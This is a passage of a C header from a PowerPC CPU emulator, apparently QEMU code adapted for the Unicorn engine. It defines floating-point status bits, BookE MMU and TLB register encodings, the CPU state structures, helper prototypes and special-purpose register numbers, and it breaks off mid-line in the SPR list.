#define FP_DRN1 (1ull << FPSCR_DRN1) #define FP_DRN0 (1ull << FPSCR_DRN0) #define FP_DRN (FP_DRN2 | FP_DRN1 | FP_DRN0) #define FP_FX (1ull << FPSCR_FX) #define FP_FEX (1ull << FPSCR_FEX) #define FP_VX (1ull << FPSCR_VX) #define FP_OX (1ull << FPSCR_OX) #define FP_UX (1ull << FPSCR_UX) #define FP_ZX (1ull << FPSCR_ZX) #define FP_XX (1ull << FPSCR_XX) #define FP_VXSNAN (1ull << FPSCR_VXSNAN) #define FP_VXISI (1ull << FPSCR_VXISI) #define FP_VXIDI (1ull << FPSCR_VXIDI) #define FP_VXZDZ (1ull << FPSCR_VXZDZ) #define FP_VXIMZ (1ull << FPSCR_VXIMZ) #define FP_VXVC (1ull << FPSCR_VXVC) #define FP_FR (1ull << FPSCR_FR) #define FP_FI (1ull << FPSCR_FI) #define FP_C (1ull << FPSCR_C) #define FP_FL (1ull << FPSCR_FL) #define FP_FG (1ull << FPSCR_FG) #define FP_FE (1ull << FPSCR_FE) #define FP_FU (1ull << FPSCR_FU) #define FP_FPCC (FP_FL | FP_FG | FP_FE | FP_FU) #define FP_FPRF (FP_C | FP_FPCC) #define FP_VXSOFT (1ull << FPSCR_VXSOFT) #define FP_VXSQRT (1ull << FPSCR_VXSQRT) #define FP_VXCVI (1ull << FPSCR_VXCVI) #define FP_VE (1ull << FPSCR_VE) #define FP_OE (1ull << FPSCR_OE) #define FP_UE (1ull << FPSCR_UE) #define FP_ZE (1ull << FPSCR_ZE) #define FP_XE (1ull << FPSCR_XE) #define FP_NI (1ull << FPSCR_NI) #define FP_RN1 (1ull << FPSCR_RN1) #define FP_RN0 (1ull << FPSCR_RN0) #define FP_RN (FP_RN1 | FP_RN0) #define FP_ENABLES (FP_VE | FP_OE | FP_UE | FP_ZE | FP_XE) #define FP_STATUS (FP_FR | FP_FI | FP_FPRF) /* the exception bits which can be cleared by mcrfs - includes FX */ #define FP_EX_CLEAR_BITS (FP_FX | FP_OX | FP_UX | FP_ZX | \ FP_XX | FP_VXSNAN | FP_VXISI | FP_VXIDI | \ FP_VXZDZ | FP_VXIMZ | FP_VXVC | FP_VXSOFT | \ FP_VXSQRT | FP_VXCVI) /*****************************************************************************/ /* Vector status and control register */ #define VSCR_NJ 16 /* Vector non-java */ #define VSCR_SAT 0 /* Vector saturation */ /*****************************************************************************/ /* BookE e500 MMU registers */ #define MAS0_NV_SHIFT 0 #define MAS0_NV_MASK (0xfff << MAS0_NV_SHIFT) #define MAS0_WQ_SHIFT 12 #define MAS0_WQ_MASK (3 << MAS0_WQ_SHIFT) /* Write TLB entry regardless of reservation */ #define MAS0_WQ_ALWAYS (0 << MAS0_WQ_SHIFT) /* Write TLB entry only already in use */ #define MAS0_WQ_COND (1 << MAS0_WQ_SHIFT) /* Clear TLB entry */ #define MAS0_WQ_CLR_RSRV (2 << MAS0_WQ_SHIFT) #define MAS0_HES_SHIFT 14 #define MAS0_HES (1 << MAS0_HES_SHIFT) #define MAS0_ESEL_SHIFT 16 #define MAS0_ESEL_MASK (0xfff << MAS0_ESEL_SHIFT) #define MAS0_TLBSEL_SHIFT 28 #define MAS0_TLBSEL_MASK (3 << MAS0_TLBSEL_SHIFT) #define MAS0_TLBSEL_TLB0 (0 << MAS0_TLBSEL_SHIFT) #define MAS0_TLBSEL_TLB1 (1 << MAS0_TLBSEL_SHIFT) #define MAS0_TLBSEL_TLB2 (2 << MAS0_TLBSEL_SHIFT) #define MAS0_TLBSEL_TLB3 (3 << MAS0_TLBSEL_SHIFT) #define MAS0_ATSEL_SHIFT 31 #define MAS0_ATSEL (1 << MAS0_ATSEL_SHIFT) #define MAS0_ATSEL_TLB 0 #define MAS0_ATSEL_LRAT MAS0_ATSEL #define MAS1_TSIZE_SHIFT 7 #define MAS1_TSIZE_MASK (0x1f << MAS1_TSIZE_SHIFT) #define MAS1_TS_SHIFT 12 #define MAS1_TS (1 << MAS1_TS_SHIFT) #define MAS1_IND_SHIFT 13 #define MAS1_IND (1 << MAS1_IND_SHIFT) #define MAS1_TID_SHIFT 16 #define MAS1_TID_MASK (0x3fff << MAS1_TID_SHIFT) #define MAS1_IPROT_SHIFT 30 #define MAS1_IPROT (1 << MAS1_IPROT_SHIFT) #define MAS1_VALID_SHIFT 31 #define MAS1_VALID 0x80000000 #define MAS2_EPN_SHIFT 12 #define MAS2_EPN_MASK (~0ULL << MAS2_EPN_SHIFT) #define MAS2_ACM_SHIFT 6 #define MAS2_ACM (1 << MAS2_ACM_SHIFT) #define MAS2_VLE_SHIFT 5 #define MAS2_VLE (1 << MAS2_VLE_SHIFT) #define MAS2_W_SHIFT 4 #define MAS2_W (1 << MAS2_W_SHIFT) #define MAS2_I_SHIFT 3 #define MAS2_I (1 << MAS2_I_SHIFT) #define MAS2_M_SHIFT 2 #define MAS2_M (1 << MAS2_M_SHIFT) #define MAS2_G_SHIFT 1 #define MAS2_G (1 << MAS2_G_SHIFT) #define MAS2_E_SHIFT 0 #define MAS2_E (1 << MAS2_E_SHIFT) #define MAS3_RPN_SHIFT 12 #define MAS3_RPN_MASK (0xfffff << MAS3_RPN_SHIFT) #define MAS3_U0 0x00000200 #define MAS3_U1 0x00000100 #define MAS3_U2 0x00000080 #define MAS3_U3 0x00000040 #define MAS3_UX 0x00000020 #define MAS3_SX 0x00000010 #define MAS3_UW 0x00000008 #define MAS3_SW 0x00000004 #define MAS3_UR 0x00000002 #define MAS3_SR 0x00000001 #define MAS3_SPSIZE_SHIFT 1 #define MAS3_SPSIZE_MASK (0x3e << MAS3_SPSIZE_SHIFT) #define MAS4_TLBSELD_SHIFT MAS0_TLBSEL_SHIFT #define MAS4_TLBSELD_MASK MAS0_TLBSEL_MASK #define MAS4_TIDSELD_MASK 0x00030000 #define MAS4_TIDSELD_PID0 0x00000000 #define MAS4_TIDSELD_PID1 0x00010000 #define MAS4_TIDSELD_PID2 0x00020000 #define MAS4_TIDSELD_PIDZ 0x00030000 #define MAS4_INDD 0x00008000 /* Default IND */ #define MAS4_TSIZED_SHIFT MAS1_TSIZE_SHIFT #define MAS4_TSIZED_MASK MAS1_TSIZE_MASK #define MAS4_ACMD 0x00000040 #define MAS4_VLED 0x00000020 #define MAS4_WD 0x00000010 #define MAS4_ID 0x00000008 #define MAS4_MD 0x00000004 #define MAS4_GD 0x00000002 #define MAS4_ED 0x00000001 #define MAS4_WIMGED_MASK 0x0000001f /* Default WIMGE */ #define MAS4_WIMGED_SHIFT 0 #define MAS5_SGS 0x80000000 #define MAS5_SLPID_MASK 0x00000fff #define MAS6_SPID0 0x3fff0000 #define MAS6_SPID1 0x00007ffe #define MAS6_ISIZE(x) MAS1_TSIZE(x) #define MAS6_SAS 0x00000001 #define MAS6_SPID MAS6_SPID0 #define MAS6_SIND 0x00000002 /* Indirect page */ #define MAS6_SIND_SHIFT 1 #define MAS6_SPID_MASK 0x3fff0000 #define MAS6_SPID_SHIFT 16 #define MAS6_ISIZE_MASK 0x00000f80 #define MAS6_ISIZE_SHIFT 7 #define MAS7_RPN 0xffffffff #define MAS8_TGS 0x80000000 #define MAS8_VF 0x40000000 #define MAS8_TLBPID 0x00000fff /* Bit definitions for MMUCFG */ #define MMUCFG_MAVN 0x00000003 /* MMU Architecture Version Number */ #define MMUCFG_MAVN_V1 0x00000000 /* v1.0 */ #define MMUCFG_MAVN_V2 0x00000001 /* v2.0 */ #define MMUCFG_NTLBS 0x0000000c /* Number of TLBs */ #define MMUCFG_PIDSIZE 0x000007c0 /* PID Reg Size */ #define MMUCFG_TWC 0x00008000 /* TLB Write Conditional (v2.0) */ #define MMUCFG_LRAT 0x00010000 /* LRAT Supported (v2.0) */ #define MMUCFG_RASIZE 0x00fe0000 /* Real Addr Size */ #define MMUCFG_LPIDSIZE 0x0f000000 /* LPID Reg Size */ /* Bit definitions for MMUCSR0 */ #define MMUCSR0_TLB1FI 0x00000002 /* TLB1 Flash invalidate */ #define MMUCSR0_TLB0FI 0x00000004 /* TLB0 Flash invalidate */ #define MMUCSR0_TLB2FI 0x00000040 /* TLB2 Flash invalidate */ #define MMUCSR0_TLB3FI 0x00000020 /* TLB3 Flash invalidate */ #define MMUCSR0_TLBFI (MMUCSR0_TLB0FI | MMUCSR0_TLB1FI | \ MMUCSR0_TLB2FI | MMUCSR0_TLB3FI) #define MMUCSR0_TLB0PS 0x00000780 /* TLB0 Page Size */ #define MMUCSR0_TLB1PS 0x00007800 /* TLB1 Page Size */ #define MMUCSR0_TLB2PS 0x00078000 /* TLB2 Page Size */ #define MMUCSR0_TLB3PS 0x00780000 /* TLB3 Page Size */ /* TLBnCFG encoding */ #define TLBnCFG_N_ENTRY 0x00000fff /* number of entries */ #define TLBnCFG_HES 0x00002000 /* HW select supported */ #define TLBnCFG_AVAIL 0x00004000 /* variable page size */ #define TLBnCFG_IPROT 0x00008000 /* IPROT supported */ #define TLBnCFG_GTWE 0x00010000 /* Guest can write */ #define TLBnCFG_IND 0x00020000 /* IND entries supported */ #define TLBnCFG_PT 0x00040000 /* Can load from page table */ #define TLBnCFG_MINSIZE 0x00f00000 /* Minimum Page Size (v1.0) */ #define TLBnCFG_MINSIZE_SHIFT 20 #define TLBnCFG_MAXSIZE 0x000f0000 /* Maximum Page Size (v1.0) */ #define TLBnCFG_MAXSIZE_SHIFT 16 #define TLBnCFG_ASSOC 0xff000000 /* Associativity */ #define TLBnCFG_ASSOC_SHIFT 24 /* TLBnPS encoding */ #define TLBnPS_4K 0x00000004 #define TLBnPS_8K 0x00000008 #define TLBnPS_16K 0x00000010 #define TLBnPS_32K 0x00000020 #define TLBnPS_64K 0x00000040 #define TLBnPS_128K 0x00000080 #define TLBnPS_256K 0x00000100 #define TLBnPS_512K 0x00000200 #define TLBnPS_1M 0x00000400 #define TLBnPS_2M 0x00000800 #define TLBnPS_4M 0x00001000 #define TLBnPS_8M 0x00002000 #define TLBnPS_16M 0x00004000 #define TLBnPS_32M 0x00008000 #define TLBnPS_64M 0x00010000 #define TLBnPS_128M 0x00020000 #define TLBnPS_256M 0x00040000 #define TLBnPS_512M 0x00080000 #define TLBnPS_1G 0x00100000 #define TLBnPS_2G 0x00200000 #define TLBnPS_4G 0x00400000 #define TLBnPS_8G 0x00800000 #define TLBnPS_16G 0x01000000 #define TLBnPS_32G 0x02000000 #define TLBnPS_64G 0x04000000 #define TLBnPS_128G 0x08000000 #define TLBnPS_256G 0x10000000 /* tlbilx action encoding */ #define TLBILX_T_ALL 0 #define TLBILX_T_TID 1 #define TLBILX_T_FULLMATCH 3 #define TLBILX_T_CLASS0 4 #define TLBILX_T_CLASS1 5 #define TLBILX_T_CLASS2 6 #define TLBILX_T_CLASS3 7 /* BookE 2.06 helper defines */ #define BOOKE206_FLUSH_TLB0 (1 << 0) #define BOOKE206_FLUSH_TLB1 (1 << 1) #define BOOKE206_FLUSH_TLB2 (1 << 2) #define BOOKE206_FLUSH_TLB3 (1 << 3) /* number of possible TLBs */ #define BOOKE206_MAX_TLBN 4 #define EPID_EPID_SHIFT 0x0 #define EPID_EPID 0xFF #define EPID_ELPID_SHIFT 0x10 #define EPID_ELPID 0x3F0000 #define EPID_EGS 0x20000000 #define EPID_EGS_SHIFT 29 #define EPID_EAS 0x40000000 #define EPID_EAS_SHIFT 30 #define EPID_EPR 0x80000000 #define EPID_EPR_SHIFT 31 /* We don't support EGS and ELPID */ #define EPID_MASK (EPID_EPID | EPID_EAS | EPID_EPR) /*****************************************************************************/ /* Server and Embedded Processor Control */ #define DBELL_TYPE_SHIFT 27 #define DBELL_TYPE_MASK (0x1f << DBELL_TYPE_SHIFT) #define DBELL_TYPE_DBELL (0x00 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_DBELL_CRIT (0x01 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_G_DBELL (0x02 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_G_DBELL_CRIT (0x03 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_G_DBELL_MC (0x04 << DBELL_TYPE_SHIFT) #define DBELL_TYPE_DBELL_SERVER (0x05 << DBELL_TYPE_SHIFT) #define DBELL_BRDCAST PPC_BIT(37) #define DBELL_LPIDTAG_SHIFT 14 #define DBELL_LPIDTAG_MASK (0xfff << DBELL_LPIDTAG_SHIFT) #define DBELL_PIRTAG_MASK 0x3fff #define DBELL_PROCIDTAG_MASK PPC_BITMASK(44, 63) #define PPC_PAGE_SIZES_MAX_SZ 8 struct ppc_radix_page_info { uint32_t count; uint32_t entries[PPC_PAGE_SIZES_MAX_SZ]; }; /*****************************************************************************/ /* The whole PowerPC CPU context */ /* * PowerPC needs eight modes for different hypervisor/supervisor/guest * + real/paged mode combinations. The other two modes are for * external PID load/store. */ #define PPC_TLB_EPID_LOAD 8 #define PPC_TLB_EPID_STORE 9 #define PPC_CPU_OPCODES_LEN 0x40 #define PPC_CPU_INDIRECT_OPCODES_LEN 0x20 struct CPUPPCState { /* Most commonly used resources during translated code execution first */ target_ulong gpr[32]; /* general purpose registers */ target_ulong gprh[32]; /* storage for GPR MSB, used by the SPE extension */ target_ulong lr; target_ulong ctr; uint32_t crf[8]; /* condition register */ #if defined(TARGET_PPC64) target_ulong cfar; #endif target_ulong xer; /* XER (with SO, OV, CA split out) */ target_ulong so; target_ulong ov; target_ulong ca; target_ulong ov32; target_ulong ca32; target_ulong reserve_addr; /* Reservation address */ target_ulong reserve_val; /* Reservation value */ target_ulong reserve_val2; /* These are used in supervisor mode only */ target_ulong msr; /* machine state register */ target_ulong tgpr[4]; /* temporary general purpose registers, */ /* used to speed-up TLB assist handlers */ target_ulong nip; /* next instruction pointer */ uint64_t retxh; /* high part of 128-bit helper return */ /* when a memory exception occurs, the access type is stored here */ int access_type; /* MMU context, only relevant for full system emulation */ #if defined(TARGET_PPC64) ppc_slb_t slb[MAX_SLB_ENTRIES]; /* PowerPC 64 SLB area */ #endif target_ulong sr[32]; /* segment registers */ uint32_t nb_BATs; /* number of BATs */ target_ulong DBAT[2][8]; target_ulong IBAT[2][8]; /* PowerPC TLB registers (for 4xx, e500 and 60x software driven TLBs) */ int32_t nb_tlb; /* Total number of TLB */ int tlb_per_way; /* Speed-up helper: used to avoid divisions at run time */ int nb_ways; /* Number of ways in the TLB set */ int last_way; /* Last used way used to allocate TLB in a LRU way */ int id_tlbs; /* If 1, MMU has separated TLBs for instructions & data */ int nb_pids; /* Number of available PID registers */ int tlb_type; /* Type of TLB we're dealing with */ ppc_tlb_t tlb; /* TLB is optional. Allocate them only if needed */ target_ulong pb[4]; /* 403 dedicated access protection registers */ bool tlb_dirty; /* Set to non-zero when modifying TLB */ bool kvm_sw_tlb; /* non-zero if KVM SW TLB API is active */ uint32_t tlb_need_flush; /* Delayed flush needed */ #define TLB_NEED_LOCAL_FLUSH 0x1 #define TLB_NEED_GLOBAL_FLUSH 0x2 /* Other registers */ target_ulong spr[1024]; /* special purpose registers */ ppc_spr_t spr_cb[1024]; /* Vector status and control register, minus VSCR_SAT */ uint32_t vscr; /* VSX registers (including FP and AVR) */ ppc_vsr_t vsr[64] QEMU_ALIGNED(16); /* Non-zero if and only if VSCR_SAT should be set */ ppc_vsr_t vscr_sat QEMU_ALIGNED(16); /* SPE registers */ uint64_t spe_acc; uint32_t spe_fscr; /* SPE and Altivec share status as they'll never be used simultaneously */ float_status vec_status; float_status fp_status; /* Floating point execution context */ target_ulong fpscr; /* Floating point status and control register */ /* Internal devices resources */ ppc_tb_t *tb_env; /* Time base and decrementer */ ppc_dcr_t *dcr_env; /* Device control registers */ int dcache_line_size; int icache_line_size; /* These resources are used during exception processing */ /* CPU model definition */ target_ulong msr_mask; powerpc_mmu_t mmu_model; powerpc_excp_t excp_model; powerpc_input_t bus_model; int bfd_mach; uint32_t flags; uint64_t insns_flags; uint64_t insns_flags2; int error_code; uint32_t pending_interrupts; /* * This is the IRQ controller, which is implementation dependent and only * relevant when emulating a complete machine. Note that this isn't used * by recent Book3s compatible CPUs (POWER7 and newer). */ uint32_t irq_input_state; void **irq_inputs; target_ulong excp_vectors[POWERPC_EXCP_NB]; /* Exception vectors */ target_ulong excp_prefix; target_ulong ivor_mask; target_ulong ivpr_mask; target_ulong hreset_vector; hwaddr mpic_iack; bool mpic_proxy; /* true if the external proxy facility mode is enabled */ bool has_hv_mode; /* set when the processor has an HV mode, thus HV priv */ /* instructions and SPRs are diallowed if MSR:HV is 0 */ /* * On P7/P8/P9, set when in PM state so we need to handle resume in a * special way (such as routing some resume causes to 0x100, i.e. sreset). */ bool resume_as_sreset; /* These resources are used only in QEMU core */ target_ulong hflags; /* hflags is MSR & HFLAGS_MASK */ target_ulong hflags_nmsr; /* specific hflags, not coming from MSR */ int immu_idx; /* precomputed MMU index to speed up insn accesses */ int dmmu_idx; /* precomputed MMU index to speed up data accesses */ /* Power management */ int (*check_pow)(CPUPPCState *env); void *load_info; /* holds boot loading state */ /* booke timers */ /* * Specifies bit locations of the Time Base used to signal a fixed timer * exception on a transition from 0 to 1 (watchdog or fixed-interval timer) * * 0 selects the least significant bit, 63 selects the most significant bit */ uint8_t fit_period[4]; uint8_t wdt_period[4]; /* Transactional memory state */ target_ulong tm_gpr[32]; ppc_avr_t tm_vsr[64]; uint64_t tm_cr; uint64_t tm_lr; uint64_t tm_ctr; uint64_t tm_fpscr; uint64_t tm_amr; uint64_t tm_ppr; uint64_t tm_vrsave; uint32_t tm_vscr; uint64_t tm_dscr; uint64_t tm_tar; /* Unicorn engine */ struct uc_struct *uc; }; #define SET_FIT_PERIOD(a_, b_, c_, d_) \ do { \ env->fit_period[0] = (a_); \ env->fit_period[1] = (b_); \ env->fit_period[2] = (c_); \ env->fit_period[3] = (d_); \ } while (0) #define SET_WDT_PERIOD(a_, b_, c_, d_) \ do { \ env->wdt_period[0] = (a_); \ env->wdt_period[1] = (b_); \ env->wdt_period[2] = (c_); \ env->wdt_period[3] = (d_); \ } while (0) #if 0 typedef struct PPCVirtualHypervisor PPCVirtualHypervisor; typedef struct PPCVirtualHypervisorClass PPCVirtualHypervisorClass; #endif /** * PowerPCCPU: * @env: #CPUPPCState * @vcpu_id: vCPU identifier given to KVM * @compat_pvr: Current logical PVR, zero if in "raw" mode * * A PowerPC CPU. */ struct PowerPCCPU { /*< private >*/ CPUState parent_obj; /*< public >*/ CPUNegativeOffsetState neg; CPUPPCState env; int vcpu_id; uint32_t compat_pvr; #if 0 PPCVirtualHypervisor *vhyp; #endif void *machine_data; int32_t node_id; /* NUMA node this CPU belongs to */ PPCHash64Options *hash64_opts; /* Those resources are used only during code translation */ /* opcode handlers */ opc_handler_t *opcodes[PPC_CPU_OPCODES_LEN]; /* Fields related to migration compatibility hacks */ bool pre_2_8_migration; target_ulong mig_msr_mask; uint64_t mig_insns_flags; uint64_t mig_insns_flags2; uint32_t mig_nb_BATs; bool pre_2_10_migration; bool pre_3_0_migration; int32_t mig_slb_nr; struct PowerPCCPUClass cc; }; PowerPCCPUClass *ppc_cpu_class_by_pvr(uint32_t pvr); PowerPCCPUClass *ppc_cpu_class_by_pvr_mask(uint32_t pvr); PowerPCCPUClass *ppc_cpu_get_family_class(PowerPCCPUClass *pcc); #if 0 struct PPCVirtualHypervisorClass { InterfaceClass parent; void (*hypercall)(PPCVirtualHypervisor *vhyp, PowerPCCPU *cpu); hwaddr (*hpt_mask)(PPCVirtualHypervisor *vhyp); const ppc_hash_pte64_t *(*map_hptes)(PPCVirtualHypervisor *vhyp, hwaddr ptex, int n); void (*unmap_hptes)(PPCVirtualHypervisor *vhyp, const ppc_hash_pte64_t *hptes, hwaddr ptex, int n); void (*hpte_set_c)(PPCVirtualHypervisor *vhyp, hwaddr ptex, uint64_t pte1); void (*hpte_set_r)(PPCVirtualHypervisor *vhyp, hwaddr ptex, uint64_t pte1); void (*get_pate)(PPCVirtualHypervisor *vhyp, ppc_v3_pate_t *entry); target_ulong (*encode_hpt_for_kvm_pr)(PPCVirtualHypervisor *vhyp); void (*cpu_exec_enter)(PPCVirtualHypervisor *vhyp, PowerPCCPU *cpu); void (*cpu_exec_exit)(PPCVirtualHypervisor *vhyp, PowerPCCPU *cpu); }; #define TYPE_PPC_VIRTUAL_HYPERVISOR "ppc-virtual-hypervisor" #define PPC_VIRTUAL_HYPERVISOR(obj) \ OBJECT_CHECK(PPCVirtualHypervisor, (obj), TYPE_PPC_VIRTUAL_HYPERVISOR) #define PPC_VIRTUAL_HYPERVISOR_CLASS(klass) \ OBJECT_CLASS_CHECK(PPCVirtualHypervisorClass, (klass), \ TYPE_PPC_VIRTUAL_HYPERVISOR) #define PPC_VIRTUAL_HYPERVISOR_GET_CLASS(obj) \ OBJECT_GET_CLASS(PPCVirtualHypervisorClass, (obj), \ TYPE_PPC_VIRTUAL_HYPERVISOR) #endif void ppc_cpu_do_interrupt(CPUState *cpu); bool ppc_cpu_exec_interrupt(CPUState *cpu, int int_req); hwaddr ppc_cpu_get_phys_page_debug(CPUState *cpu, vaddr addr); void ppc_cpu_do_system_reset(CPUState *cs, target_ulong vector); void ppc_cpu_do_fwnmi_machine_check(CPUState *cs, target_ulong vector); #if 0 extern const VMStateDescription vmstate_ppc_cpu; #endif /*****************************************************************************/ void ppc_translate_init(struct uc_struct *uc); /* * you can call this signal handler from your SIGBUS and SIGSEGV * signal handlers to inform the virtual CPU of exceptions. non zero * is returned if the signal was handled by the virtual CPU. */ int cpu_ppc_signal_handler(int host_signum, void *pinfo, void *puc); bool ppc_cpu_tlb_fill(CPUState *cs, vaddr address, int size, MMUAccessType access_type, int mmu_idx, bool probe, uintptr_t retaddr); void ppc_store_sdr1(CPUPPCState *env, target_ulong value); void ppc_store_ptcr(CPUPPCState *env, target_ulong value); void ppc_store_msr(CPUPPCState *env, target_ulong value); void ppc_cpu_list(void); /* Time-base and decrementer management */ #ifndef NO_CPU_IO_DEFS uint64_t cpu_ppc_load_tbl(CPUPPCState *env); uint32_t cpu_ppc_load_tbu(CPUPPCState *env); void cpu_ppc_store_tbu(CPUPPCState *env, uint32_t value); void cpu_ppc_store_tbl(CPUPPCState *env, uint32_t value); uint64_t cpu_ppc_load_atbl(CPUPPCState *env); uint32_t cpu_ppc_load_atbu(CPUPPCState *env); void cpu_ppc_store_atbl(CPUPPCState *env, uint32_t value); void cpu_ppc_store_atbu(CPUPPCState *env, uint32_t value); uint64_t cpu_ppc_load_vtb(CPUPPCState *env); void cpu_ppc_store_vtb(CPUPPCState *env, uint64_t value); bool ppc_decr_clear_on_delivery(CPUPPCState *env); target_ulong cpu_ppc_load_decr(CPUPPCState *env); void cpu_ppc_store_decr(CPUPPCState *env, target_ulong value); target_ulong cpu_ppc_load_hdecr(CPUPPCState *env); void cpu_ppc_store_hdecr(CPUPPCState *env, target_ulong value); void cpu_ppc_store_tbu40(CPUPPCState *env, uint64_t value); uint64_t cpu_ppc_load_purr(CPUPPCState *env); void cpu_ppc_store_purr(CPUPPCState *env, uint64_t value); uint32_t cpu_ppc601_load_rtcl(CPUPPCState *env); uint32_t cpu_ppc601_load_rtcu(CPUPPCState *env); void cpu_ppc601_store_rtcl(CPUPPCState *env, uint32_t value); void cpu_ppc601_store_rtcu(CPUPPCState *env, uint32_t value); target_ulong load_40x_pit(CPUPPCState *env); void store_40x_pit(CPUPPCState *env, target_ulong val); void store_40x_dbcr0(CPUPPCState *env, uint32_t val); void store_40x_sler(CPUPPCState *env, uint32_t val); void store_booke_tcr(CPUPPCState *env, target_ulong val); void store_booke_tsr(CPUPPCState *env, target_ulong val); void ppc_tlb_invalidate_all(CPUPPCState *env); void ppc_tlb_invalidate_one(CPUPPCState *env, target_ulong addr); #if 0 void cpu_ppc_set_vhyp(PowerPCCPU *cpu, PPCVirtualHypervisor *vhyp); #endif #endif void store_fpscr(CPUPPCState *env, uint64_t arg, uint32_t mask); void helper_hfscr_facility_check(CPUPPCState *env, uint32_t bit, const char *caller, uint32_t cause); static inline uint64_t ppc_dump_gpr(CPUPPCState *env, int gprn) { uint64_t gprv; gprv = env->gpr[gprn]; if (env->flags & POWERPC_FLAG_SPE) { /* * If the CPU implements the SPE extension, we have to get the * high bits of the GPR from the gprh storage area */ gprv &= 0xFFFFFFFFULL; gprv |= (uint64_t)env->gprh[gprn] << 32; } return gprv; } /* Device control registers */ int ppc_dcr_read(ppc_dcr_t *dcr_env, int dcrn, uint32_t *valp); int ppc_dcr_write(ppc_dcr_t *dcr_env, int dcrn, uint32_t val); #define POWERPC_CPU_TYPE_SUFFIX "-" TYPE_POWERPC_CPU #define POWERPC_CPU_TYPE_NAME(model) model POWERPC_CPU_TYPE_SUFFIX #define CPU_RESOLVING_TYPE TYPE_POWERPC_CPU #define cpu_signal_handler cpu_ppc_signal_handler #define cpu_list ppc_cpu_list /* MMU modes definitions */ #define MMU_USER_IDX 0 static inline int cpu_mmu_index(CPUPPCState *env, bool ifetch) { return ifetch ? env->immu_idx : env->dmmu_idx; } /* Compatibility modes */ #if defined(TARGET_PPC64) bool ppc_check_compat(PowerPCCPU *cpu, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr); bool ppc_type_check_compat(const char *cputype, uint32_t compat_pvr, uint32_t min_compat_pvr, uint32_t max_compat_pvr); void ppc_set_compat(PowerPCCPU *cpu, uint32_t compat_pvr); void ppc_set_compat_all(uint32_t compat_pvr); int ppc_compat_max_vthreads(PowerPCCPU *cpu); #if 0 void ppc_compat_add_property(Object *obj, const char *name, uint32_t *compat_pvr, const char *basedesc); #endif #endif /* defined(TARGET_PPC64) */ typedef CPUPPCState CPUArchState; typedef PowerPCCPU ArchCPU; #include "exec/cpu-all.h" /*****************************************************************************/ /* CRF definitions */ #define CRF_LT_BIT 3 #define CRF_GT_BIT 2 #define CRF_EQ_BIT 1 #define CRF_SO_BIT 0 #define CRF_LT (1 << CRF_LT_BIT) #define CRF_GT (1 << CRF_GT_BIT) #define CRF_EQ (1 << CRF_EQ_BIT) #define CRF_SO (1 << CRF_SO_BIT) /* For SPE extensions */ #define CRF_CH (1 << CRF_LT_BIT) #define CRF_CL (1 << CRF_GT_BIT) #define CRF_CH_OR_CL (1 << CRF_EQ_BIT) #define CRF_CH_AND_CL (1 << CRF_SO_BIT) /* XER definitions */ #define XER_SO 31 #define XER_OV 30 #define XER_CA 29 #define XER_OV32 19 #define XER_CA32 18 #define XER_CMP 8 #define XER_BC 0 #define xer_so (env->so) #define xer_ov (env->ov) #define xer_ca (env->ca) #define xer_ov32 (env->ov) #define xer_ca32 (env->ca) #define xer_cmp ((env->xer >> XER_CMP) & 0xFF) #define xer_bc ((env->xer >> XER_BC) & 0x7F) /* SPR definitions */ #define SPR_MQ (0x000) #define SPR_XER (0x001) #define SPR_601_VRTCU (0x004) #define SPR_601_VRTCL (0x005) #define SPR_601_UDECR (0x006) #define SPR_LR (0x008) #define SPR_CTR (0x009) #define SPR_UAMR (0x00D) #define SPR_DSCR (0x011) #define SPR_DSISR (0x012) #define SPR_DAR (0x013) /* DAE for PowerPC 601 */ #define SPR_601_RTCU (0x014) #define SPR_601_RTCL (0x015) #define SPR_DECR (0x016) #define SPR_SDR1 (0x019) #define SPR_SRR0 (0x01A) #define SPR_SRR1 (0x01B) #define SPR_CFAR (0x01C) #define SPR_AMR (0x01D) #define SPR_ACOP (0x01F) #define SPR_BOOKE_PID (0x030) #define SPR_BOOKS_PID (0x030) #define SPR_BOOKE_DECAR (0x036) #define SPR_BOOKE_CSRR0 (0x03A) #define SPR_BOOKE_CSRR1 (0x03B) #define SPR_BOOKE_DEAR (0x03D) #define SPR_IAMR (0x03D) #define SPR_BOOKE_ESR (0x03E) #define SPR_BOOKE_IVPR (0x03F) #define SPR_MPC_EIE (0x050) #define SPR_MPC_EID (0x051) #define SPR_MPC_NRI (0x052) #define SPR_TFHAR (0x080) #define SPR_TFIAR (0x081) #define SPR_TEXASR (0x082) #define SPR_TEXASRU (0x083) #define SPR_UCTRL (0x088) #define SPR_TIDR (0x090) #define SPR_MPC_CMPA (0x090) #define SPR_MPC_CMPB (0x091) #define SPR_MPC_CMPC (0x092) #define SPR_MPC_CMPD (0x093) #define SPR_MPC_ECR (0x094) #define SPR_MPC_DER (0x095) #define SPR_MPC_COUNTA (0x096) #define SPR_MPC_COUNTB (0x097) #define SPR_CTRL (0x098) #define SPR_MPC_CMPE (0x098) #define SPR_MPC_CMPF (0x099) #define SPR_FSCR (0x099) #define SPR_MPC_CMPG (0x09A) #define SPR_MPC_CMPH (0x09B) #define SPR_MPC_LCTRL1 (0x09C) #define SPR_MPC_LCTRL2 (0x09D) #define SPR_UAMOR (0x09D) #define SPR_MPC_ICTRL (0x09E) #define SPR_MPC_BAR (0x09F) #define SPR_PSPB (0x09F) #define SPR_DPDES (0x0B0) #define SPR_DAWR (0x0B4) #define SPR_RPR (0x0BA) #define SPR_CIABR (0x0BB) #define SPR_DAWRX (0x0BC) #define SPR_HFSCR (0x0BE) #define SPR_VRSAVE (0x100) #define SPR_USPRG0 (0x100) #define SPR_USPRG1 (0x101) #define SPR_USPRG2 (0x102) #define SPR_USPRG3 (0x103) #define SPR_USPRG4 (0x104) #define SPR_USPRG5 (0x105) #define SPR_USPRG6 (0x106) #define SPR_USPRG7 (0x107) #define SPR_VTBL (0x10C) #define SPR_VTBU (0x10D) #define SPR_SPRG0 (0x110) #define SPR_SPRG1 (0x111) #define SPR_SPRG2 (0x112) #define SPR_SPRG3 (0x113) #define SPR_SPRG4 (0x114) #define SPR_SCOMC (0x114) #define SPR_SPRG5 (0x115) #define SPR_SCOMD (0x115) #define SPR_SPRG6 (0x116) #define SPR_SPRG7 (0x117) #define SPR_ASR (0x118) #define SPR_EAR (0x11A) #define SPR_TBL (0x11C) #define SPR_TBU (0x11D) #define SPR_TBU40 (0x11E) #define SPR_SVR 